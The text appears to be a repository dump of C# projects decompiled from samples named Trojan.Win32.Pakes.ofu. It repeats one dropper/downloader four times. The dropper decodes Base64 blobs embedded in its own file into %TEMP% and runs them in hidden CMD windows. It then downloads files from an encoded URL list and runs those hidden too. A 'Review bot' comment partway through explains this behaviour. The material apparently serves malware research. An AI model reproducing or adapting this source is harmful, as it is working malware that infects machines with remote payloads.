{6EDE12CE-6227-4D5B-8BDA-873B05B7D2A9}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{6EDE12CE-6227-4D5B-8BDA-873B05B7D2A9}.Debug|Any CPU.Build.0 = Debug|Any CPU
{6EDE12CE-6227-4D5B-8BDA-873B05B7D2A9}.Release|Any CPU.ActiveCfg = Release|Any CPU
{6EDE12CE-6227-4D5B-8BDA-873B05B7D2A9}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,133 @@
// Decompiled with JetBrains decompiler
// Type: n.C
// Assembly: g, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BF8D38A2-3CA7-4EC1-9420-BC56FCE07E26
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-b75a45700559264a2ddbc6705336f3e3fabada8ad65e34254dfb751348adf2af.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Net;
using System.Text;
namespace n
{
public class C
{
[STAThread]
public static void main()
{
string str1 = "CMD.exe /k start %TEMP%\\";
string Expression1 = "TEMP";
try
{
C c1 = new C();
Array Instance1 = (Array) Strings.Split(System.IO.File.ReadAllText(AppDomain.CurrentDomain.FriendlyName), "**");
Array Instance2 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 1
}, (string[]) null)), "&");
Array Instance3 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 0
}, (string[]) null)), "\r\n");
Array Instance4 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 1
}, (string[]) null)), "\r\n");
int num1 = checked (Instance4.Length - 2);
int num2 = 0;
while (num2 <= num1)
{
try
{
System.IO.File.WriteAllBytes(Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\" + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), c1.v(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance4, new object[1]
{
(object) num2
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
checked { ++num2; }
}
if (Operators.CompareString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 2
}, (string[]) null).ToString(), "^", false) == 0)
return;
C c2 = c1;
Array Instance5 = Instance1;
object[] objArray1 = new object[1];
object[] objArray2 = objArray1;
int num3 = 2;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) num3;
objArray2[0] = (object) local1;
object[] Arguments = objArray1;
string str2 = Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance5, Arguments, (string[]) null));
ref string local2 = ref str2;
string Expression2 = c2.t(ref local2);
NewLateBinding.LateIndexSetComplex((object) Instance1, new object[2]
{
(object) num3,
(object) str2
}, (string[]) null, true, false);
Array array = (Array) Strings.Split(Expression2, "\r\n");
int num4 = 0;
try
{
foreach (object obj in array)
{
string str3 = Conversions.ToString(obj);
try
{
if (Operators.CompareString(str3, "", false) == 0)
ProjectData.EndApp();
Array Instance6 = (Array) Strings.Split(str3, ".");
new WebClient().DownloadFile(str3, Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + "F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))), AppWinStyle.Hide);
checked { ++num4; }
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public byte[] v(string s) => Convert.FromBase64String(s);
public string t(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
}
}
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-b75a45700559264a2ddbc6705336f3e3fabada8ad65e34254dfb751348adf2af.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{07BE9FA1-5B83-4734-92C5-2A01474C360B}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>g</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>n</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="C.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "g", "Trojan.Win32.Pakes.ofu-b75a45700559264a2ddbc6705336f3e3fabada8ad65e34254dfb751348adf2af.csproj", "{07BE9FA1-5B83-4734-92C5-2A01474C360B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{07BE9FA1-5B83-4734-92C5-2A01474C360B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{07BE9FA1-5B83-4734-92C5-2A01474C360B}.Debug|Any CPU.Build.0 = Debug|Any CPU
{07BE9FA1-5B83-4734-92C5-2A01474C360B}.Release|Any CPU.ActiveCfg = Release|Any CPU
{07BE9FA1-5B83-4734-92C5-2A01474C360B}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,133 @@
// Decompiled with JetBrains decompiler
// Type: n.C
// Assembly: g, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BF8D38A2-3CA7-4EC1-9420-BC56FCE07E26
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Pakes.ofu-dc29ba9c0ad8cd76fb4a42aafbf2994b45c55b81a870bc303c8449e0191403ae.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Net;
using System.Text;
namespace n
{
public class C
{
[STAThread]
public static void main()
{
string str1 = "CMD.exe /k start %TEMP%\\";
string Expression1 = "TEMP";
try
{
C c1 = new C();
Array Instance1 = (Array) Strings.Split(System.IO.File.ReadAllText(AppDomain.CurrentDomain.FriendlyName), "**");
Array Instance2 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 1
}, (string[]) null)), "&");
Array Instance3 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 0
}, (string[]) null)), "\r\n");
Array Instance4 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 1
}, (string[]) null)), "\r\n");
int num1 = checked (Instance4.Length - 2);
int num2 = 0;
while (num2 <= num1)
{
try
{
System.IO.File.WriteAllBytes(Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\" + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), c1.v(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance4, new object[1]
{
(object) num2
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
checked { ++num2; }
}
if (Operators.CompareString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 2
}, (string[]) null).ToString(), "^", false) == 0)
return;
C c2 = c1;
Array Instance5 = Instance1;
object[] objArray1 = new object[1];
object[] objArray2 = objArray1;
int num3 = 2;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) num3;
objArray2[0] = (object) local1;
object[] Arguments = objArray1;
string str2 = Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance5, Arguments, (string[]) null));
ref string local2 = ref str2;
string Expression2 = c2.t(ref local2);
NewLateBinding.LateIndexSetComplex((object) Instance1, new object[2]
{
(object) num3,
(object) str2
}, (string[]) null, true, false);
Array array = (Array) Strings.Split(Expression2, "\r\n");
int num4 = 0;
try
{
foreach (object obj in array)
{
string str3 = Conversions.ToString(obj);
try
{
if (Operators.CompareString(str3, "", false) == 0)
ProjectData.EndApp();
Array Instance6 = (Array) Strings.Split(str3, ".");
new WebClient().DownloadFile(str3, Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + "F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))), AppWinStyle.Hide);
checked { ++num4; }
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public byte[] v(string s) => Convert.FromBase64String(s);
public string t(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
}
}
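Review bot: `main()` in this `C.cs` has no analyst comment, so a reader must untangle the late-bound `NewLateBinding` calls to learn what the sample does. A short header above `main()` should record the visible behaviour. The method splits the text of the file named by `AppDomain.CurrentDomain.FriendlyName` on `**`, Base64-decodes embedded blobs to `%TEMP%\<n>.<ext>`, and starts each one through a hidden `CMD.exe /k start`. Unless field 2 is `^`, it then Base64-decodes a newline-separated list, hands each entry to `WebClient.DownloadFile` as `%TEMP%\F<n>.<ext>`, and starts that file the same way. The header should also flag `__Boxed<int> local1` and the never-assigned `IEnumerator enumerator` in the `finally` as decompiler artifacts, for example `// decompiler artifact, not original logic; does not compile`. The `C.cs` sections for the `ec958612…` and `f856a557…` samples repeat this body with the same MVID and differ only in the `Assembly location` line, so the same note applies there.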
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Pakes.ofu-dc29ba9c0ad8cd76fb4a42aafbf2994b45c55b81a870bc303c8449e0191403ae.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{060B41F0-6140-45A5-AB3C-DCE3CAE79A85}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>g</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>n</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="C.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "g", "Trojan.Win32.Pakes.ofu-dc29ba9c0ad8cd76fb4a42aafbf2994b45c55b81a870bc303c8449e0191403ae.csproj", "{060B41F0-6140-45A5-AB3C-DCE3CAE79A85}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{060B41F0-6140-45A5-AB3C-DCE3CAE79A85}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{060B41F0-6140-45A5-AB3C-DCE3CAE79A85}.Debug|Any CPU.Build.0 = Debug|Any CPU
{060B41F0-6140-45A5-AB3C-DCE3CAE79A85}.Release|Any CPU.ActiveCfg = Release|Any CPU
{060B41F0-6140-45A5-AB3C-DCE3CAE79A85}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,133 @@
// Decompiled with JetBrains decompiler
// Type: n.C
// Assembly: g, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BF8D38A2-3CA7-4EC1-9420-BC56FCE07E26
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Pakes.ofu-ec9586122f78047c38e5841b03c6769a50700bb509faa299b7aa58a58ef67877.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Net;
using System.Text;
namespace n
{
public class C
{
[STAThread]
public static void main()
{
string str1 = "CMD.exe /k start %TEMP%\\";
string Expression1 = "TEMP";
try
{
C c1 = new C();
Array Instance1 = (Array) Strings.Split(System.IO.File.ReadAllText(AppDomain.CurrentDomain.FriendlyName), "**");
Array Instance2 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 1
}, (string[]) null)), "&");
Array Instance3 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 0
}, (string[]) null)), "\r\n");
Array Instance4 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 1
}, (string[]) null)), "\r\n");
int num1 = checked (Instance4.Length - 2);
int num2 = 0;
while (num2 <= num1)
{
try
{
System.IO.File.WriteAllBytes(Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\" + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), c1.v(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance4, new object[1]
{
(object) num2
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
checked { ++num2; }
}
if (Operators.CompareString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 2
}, (string[]) null).ToString(), "^", false) == 0)
return;
C c2 = c1;
Array Instance5 = Instance1;
object[] objArray1 = new object[1];
object[] objArray2 = objArray1;
int num3 = 2;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) num3;
objArray2[0] = (object) local1;
object[] Arguments = objArray1;
string str2 = Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance5, Arguments, (string[]) null));
ref string local2 = ref str2;
string Expression2 = c2.t(ref local2);
NewLateBinding.LateIndexSetComplex((object) Instance1, new object[2]
{
(object) num3,
(object) str2
}, (string[]) null, true, false);
Array array = (Array) Strings.Split(Expression2, "\r\n");
int num4 = 0;
try
{
foreach (object obj in array)
{
string str3 = Conversions.ToString(obj);
try
{
if (Operators.CompareString(str3, "", false) == 0)
ProjectData.EndApp();
Array Instance6 = (Array) Strings.Split(str3, ".");
new WebClient().DownloadFile(str3, Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + "F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))), AppWinStyle.Hide);
checked { ++num4; }
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public byte[] v(string s) => Convert.FromBase64String(s);
public string t(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
}
}
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Pakes.ofu-ec9586122f78047c38e5841b03c6769a50700bb509faa299b7aa58a58ef67877.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{0CF8B261-4C87-4C0F-9F9A-21FEA6DB3759}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>g</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>n</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="C.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "g", "Trojan.Win32.Pakes.ofu-ec9586122f78047c38e5841b03c6769a50700bb509faa299b7aa58a58ef67877.csproj", "{0CF8B261-4C87-4C0F-9F9A-21FEA6DB3759}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{0CF8B261-4C87-4C0F-9F9A-21FEA6DB3759}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{0CF8B261-4C87-4C0F-9F9A-21FEA6DB3759}.Debug|Any CPU.Build.0 = Debug|Any CPU
{0CF8B261-4C87-4C0F-9F9A-21FEA6DB3759}.Release|Any CPU.ActiveCfg = Release|Any CPU
{0CF8B261-4C87-4C0F-9F9A-21FEA6DB3759}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,133 @@
// Decompiled with JetBrains decompiler
// Type: n.C
// Assembly: g, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BF8D38A2-3CA7-4EC1-9420-BC56FCE07E26
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Pakes.ofu-f856a557aba5c4e79ea585a6f9988e259e3025ed5246a4d0d37087ccd0159aeb.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Net;
using System.Text;
namespace n
{
public class C
{
[STAThread]
public static void main()
{
string str1 = "CMD.exe /k start %TEMP%\\";
string Expression1 = "TEMP";
try
{
C c1 = new C();
Array Instance1 = (Array) Strings.Split(System.IO.File.ReadAllText(AppDomain.CurrentDomain.FriendlyName), "**");
Array Instance2 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 1
}, (string[]) null)), "&");
Array Instance3 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 0
}, (string[]) null)), "\r\n");
Array Instance4 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 1
}, (string[]) null)), "\r\n");
int num1 = checked (Instance4.Length - 2);
int num2 = 0;
while (num2 <= num1)
{
try
{
System.IO.File.WriteAllBytes(Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\" + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), c1.v(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance4, new object[1]
{
(object) num2
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
checked { ++num2; }
}
if (Operators.CompareString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 2
}, (string[]) null).ToString(), "^", false) == 0)
return;
C c2 = c1;
Array Instance5 = Instance1;
object[] objArray1 = new object[1];
object[] objArray2 = objArray1;
int num3 = 2;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) num3;
objArray2[0] = (object) local1;
object[] Arguments = objArray1;
string str2 = Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance5, Arguments, (string[]) null));
ref string local2 = ref str2;
string Expression2 = c2.t(ref local2);
NewLateBinding.LateIndexSetComplex((object) Instance1, new object[2]
{
(object) num3,
(object) str2
}, (string[]) null, true, false);
Array array = (Array) Strings.Split(Expression2, "\r\n");
int num4 = 0;
try
{
foreach (object obj in array)
{
string str3 = Conversions.ToString(obj);
try
{
if (Operators.CompareString(str3, "", false) == 0)
ProjectData.EndApp();
Array Instance6 = (Array) Strings.Split(str3, ".");
new WebClient().DownloadFile(str3, Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + "F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))), AppWinStyle.Hide);
checked { ++num4; }
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public byte[] v(string s) => Convert.FromBase64String(s);
public string t(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
}
}
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Pakes.ofu-f856a557aba5c4e79ea585a6f9988e259e3025ed5246a4d0d37087ccd0159aeb.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{3FF838A6-B2D0-4042-B284-421D7F00338F}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>g</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>n</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="C.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "g", "Trojan.Win32.Pakes.ofu-f856a557aba5c4e79ea585a6f9988e259e3025ed5246a4d0d37087ccd0159aeb.csproj", "{3FF838A6-B2D0-4042-B284-421D7F00338F}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
